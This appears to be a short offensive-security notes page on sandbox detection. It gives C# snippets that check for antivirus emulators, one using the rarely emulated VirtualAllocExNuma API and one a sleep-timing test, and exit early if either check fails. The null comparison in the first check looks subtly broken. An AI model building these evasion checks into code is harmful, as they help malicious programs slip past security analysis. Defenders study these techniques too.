Dynamic Analysis

Sandbox Detection

Resources

#Sandbox evasion using rare-emulated API to attempt heuristics/behaviour bypass
[DllImport("kernel32.dll")]
private static extern IntPtr VirtualAllocExNuma(IntPtr hProcess, IntPtr lpAddress, uint dwSize, UInt32 flAllocationType, UInt32 flProtect, UInt32 nndPreferred);

IntPtr mem = VirtualAllocExNuma(GetCurrentProcess(), IntPtr.Zero, 0x1000, 0x3000, 0x4, 0);
if (mem == null)
{
	Console.WriteLine("[-] VirtualAllocExNuma check failed.");
	return;
}
			
#Sleep for 3 seconds to evade in-memory scan and checks if the emulator did not fast forward through the sleep instruction
[DllImport("kernel32.dll")]
static extern void Sleep(uint dwMilliseconds);
		
[DllImport("kernel32.dll")]
static extern IntPtr GetCurrentProcess();

DateTime time1 = DateTime.Now;
Sleep(3000);
double time2 = DateTime.Now.Subtract(time1).TotalSeconds;
			
if (time2 < 2.5)
{
	Console.WriteLine("[-] Sleep check failed.");
	return;
}

Last updated